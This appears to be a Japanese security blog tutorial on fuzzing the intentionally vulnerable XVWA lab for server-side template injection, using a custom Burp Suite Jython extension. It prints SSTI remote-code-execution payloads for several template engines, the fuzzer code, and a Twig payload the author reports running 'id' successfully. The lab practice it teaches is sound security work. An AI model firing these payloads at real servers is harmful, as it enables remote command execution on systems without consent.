初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は以前紹介した総受けサイト「XVWA」に対してFuzzing攻撃を仕掛けてみたときのことをまとめてみようと思う。
今回はFuzzingとしてSSTIの脆弱性を付くようなコードを送り込みます。
※ツールとしてはBurpSuite(「OS Command Injection編」を参照)の拡張機能を使います。
拡張機能コードを自作していきます。
※XVWAをローカルに立てる記事は以下になります。
※その他色々と「XVWA」ちゃんをいじめた記事もあるのでこっちもみていってね!!
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
目次
- Fuzzingとは
- SSTI攻撃とは
- スクリプト作成
- Payloadリストを作成
- BurpSuite拡張機能作成
- Fuzzing実践
- スクリプトの取り込み
- 実行
- まとめ
Fuzzingとは
IPAが示している「ファジング活用の手引き」から以下の文言を引用する。
「ファジング」とは、検査対象のソフトウェア製品に「ファズ(英名:fuzz)」と呼ばれる問題
を引き起こしそうなデータを大量に送り込み、その応答や挙動を監視することで脆弱性を検出す
る検査手法です。
要するに、脆弱性が発露しそうな文字列などを大量に叩き込んでみて、診断してみようとかいった感じである。
SSTI攻撃とは
テンプレートエンジンをサーバ側で動かして、意図しない出力をさせるやつですね。
phpを使うシステムで、HTML内に{{3 + 3}}
みたいなのがあれば6
って出力してくれるたりするアレ使います。
例としては以下のようコードがあります。脆弱性が発露すればRCEが成立しちゃいますね。
- java
${T(java.lang.Runtime).getRuntime().exec('id')}
- javascript
{% import os %}{{ os.popen("id").read() }}
- Python
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
スクリプト作成
ここからはSSTIの脆弱性が発露するようなコードを使ってFuzzingするためのPythonスクリプトを組んでいきます。
※「BApp Stores」にはBurpSuiteのいい拡張機能がそろっているので、自作する必要性がない場合はここから読まなくていいかもね(笑)
※というよりこのレベルの通信量であればただの脆弱性検査、タイトル詐欺ですね(笑)
Payloadリストを作成
今回のSSTIを検査するためのPayloadは以下のGitHubから拝借しました。
これらのPayloadをPython内部で使うために少々整形を行います。
import sys
# Pyhton用のPayload_List作成関数
def list_export(filepath):
new_scripts = list()
with open(filepath, 'r', encoding='utf-8') as f:
for script in f.read().splitlines():
if '\"' in script and "\'" not in script:
parse = f'\'{script}\','
new_scripts.append(parse)
elif "\'" in script and '\"' not in script:
parse = f'\"{script}\",'
new_scripts.append(parse)
elif '\"' not in script and "\'" not in script:
parse = f'\"{script}\",'
new_scripts.append(parse)
return new_scripts
if __name__ == '__main__':
if sys.argv[1]:
new_lists = list_export(sys.argv[1])
if new_lists:
with open('output.txt', 'w', encoding='utf-8', newline='\n') as f:
for new_list in new_lists:
f.write(new_list)
f.write('\n')
else :
print('No list')
else:
print('require file name')
第一引数としてPayloadの一覧が記載されているファイルを読み込みます。そのファイルの各行を読み込んだのちに、
Pythonのリストとして扱うことが出来るようにPayloadを'
や"
で文字列認識するように囲います。あとは最後にコンマつける感じですね。
単純な整形です。
※'
や"
が両方とも含まれているのはPayloadリストに入ってこないのが難点。何かいい方法ないかね?
BurpSuite拡張機能作成
上記で作成したリストをもとにBurpSuiteの拡張機能を作成していきます。
from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.util import List, ArrayList
import random
try_num = 30 #1つの入力値に対するペイロード実行回数
payload_list = [
"{{2*2}}[[3*3]]",
"{{3*3}}",
"{{3*'3'}}",
.....#以下略
]
class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.registerIntruderPayloadGeneratorFactory(self)
return
def getGeneratorName(self):
return "SSTI Payload Generator" #Burpで表示される名前設定
def createNewInstance(self, attack):
return BurpFuzzer(self, attack)
class BurpFuzzer(IIntruderPayloadGenerator):
def __init__(self, extender, attack):
self._extender = extender
self._helpers = extender._helpers
self._attack = attack
self.max_payloads = try_num
self.num_iterations = 0
self.num_tried = list() #過去に実行したことがあるペイロードの番号リスト
return
def hasMorePayloads(self):
if self.num_iterations == self.max_payloads:
return False
else:
return True
def getNextPayload(self, current_payload):
payload = ''.join(chr(x) for x in current_payload)
payload = self.mutate_payload(payload)
self.num_iterations += 1
return payload
def reset(self):
self.num_iterations = 0
return
def mutate_payload(self, original_payload):
#どこにペイロードを紛れ込ませるかはランダムに決定。
offset = random.randint(0, len(original_payload) - 1)
front, back = original_payload[:offset], original_payload[offset:]
#実行回数がPayloadリスト数を上回れば一生回るので注意
while True:
sample_number = random.randint(0, len(payload_list) -1)
if sample_number not in self.num_tried:
self.num_tried.append(sample_number)
break
front += payload_list[sample_number]
return front + back
payload_list
内部に先ほど作成したリストを書き込み、そのPayloadリストからランダムでPayloadを埋め込んだ通信を実施する。
そのPayloadを埋め込む箇所も、BurpSuiteから実際に行った正常通信の文字列のどこに埋め込むかはランダムで決定するようにしている。
Fuzzing実践
作成したスクリプトを用いて実際にFuzzingしてみようかなと思ってみたり...
スクリプトの取り込み
BurpSuiteでPythonを実行するためにはまず'Jython'をインストールする必要があります。
以下のサイトから「Jython Standalone」のJARファイルをインストールします。
その後、JARファイルをBurpsuiteに入れ込む際には以下のように
「Extender」→「Options」→「Python Environment」からファイルを読み込みます。
次に作成したPythonファイルの読み込みを読み込む。以下のように、
「Extender」→「Extensions」→「Add」→「Extension Details」を押していき、
「Extension type:」で「Python」を選択、「Select file ...」で先ほど作成した「ssti_pentest.py」を選択する。
これで読み込みが完了すれば、Fuzzingする環境は整った...
実行
まず正常通信を見てみましょう。
「XVWA」ちゃんを立ち上げて以下の「Server Side Template Injection」へ進みます。
次に「Enter Your Name」の中に適当に文字列(aaaとか)を入れてリクエストを投げてみます。
BurpSuiteをプロキシ設定していると以下のように通信していることがわかります。
ブラウザ上ではこのように見えます。
では、Fuzzingをやってみよう。
該当の通信のログに対して右クリックをして「Send Intruder」を選択。
次に以下のようにクリック
「Intruder」→「Payloads」
出てきた表示内容の「Payload Sets」の「Payload type:」を「Extension-generated」に設定し
「Payload Options」から該当のものを選択する。(今回は表示名「SSTI Payload Generator」ですな)
「Positions」タブへ行き、ペイロードを埋め込む位置を確認する。
§
マークで囲われている薄緑色の箇所がそれである。
※最初はCockie
のPHPSESSID
にもかかっているが、今回は検査対象としていない。
「Start attack」で検査開始である。
※実施したら少し回り終わるまで待ってみよう...
...以下のように結果の一部を表示する。
上記のように{{3*3}}
が計算されて出てくるなぁ。あるねぇ。。PHPだねぇ。。。
※まぁ脆弱性あるように設計されてるやられサイトなんで当たり前なんですが。
というわけでPHP系のコードを試してみたら以下のTwingに対するPayloadでRCE攻撃ができた。
※よく見たらXVWAちゃんにTwing使ってるって書いてる(笑)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
怖い。。。
ページのコード内部を見てみると、リクエストから受け取った値をそのままrender, echo
してますね。
まとめ
第十四回の投稿はいかがだったでしょうか?
XVWAちゃんにBurpSuiteを使ったFuzzing(違う)を行い、脆弱性の検査を実施しました。
今回もセキュリティエンジニアの皆さんの助けになればなと思います。